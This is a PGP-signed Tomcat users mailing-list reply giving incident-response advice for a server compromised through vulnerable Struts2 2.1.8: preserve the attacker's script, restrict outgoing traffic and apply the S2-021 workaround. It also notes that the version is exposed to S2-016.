-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cédric,
On 5/1/14, 10:00 AM, Cédric Couralet wrote: > 2014-04-30 19:07 GMT+02:00 Christopher Schultz > <ch...@christopherschultz.net >> : > > Leonardo, > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: >>>> Im uploading mi logfiles so it will be available when >>>> finished uploading. > > Remember to get a thread dump while Runtime.exec() is running. > > You should copy the script /tmp/4.sh somewhere else so you have a > copy in case the attacker tries to clean-up after themselves. > That's certainly what's doing the evil work. > > You could probably set up iptables or something to restrict > outgoing requests so that the attack can't progress across your > network. > >>>> Regarding the configuration, its working in two other sites >>>> without problem, and there is no problem putting L4 balancing >>>> with haproxy. >>>> >>>> I have asked developers about that exploit, still without >>>> answer. > > You appear to be using struts2 2.1.8, which is in the range of > versions vulnerable to this bug. There is a workaround that you > can probably apply: > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the > last section on this page). > >> Of course, the vulnerability doesn't allow you to simply inject >> code > or anything like that: you can certainly mess-around with code that > is already available on the site, though. > > >> I think the S2-021 can be used to inject code. There is a POC >> circulating proving it. That said, this struts version (2.1.8) is >> also vulnerable to >> http://struts.apache.org/release/2.3.x/docs/s2-016.html which >> permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -----END PGP SIGNATURE----- --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
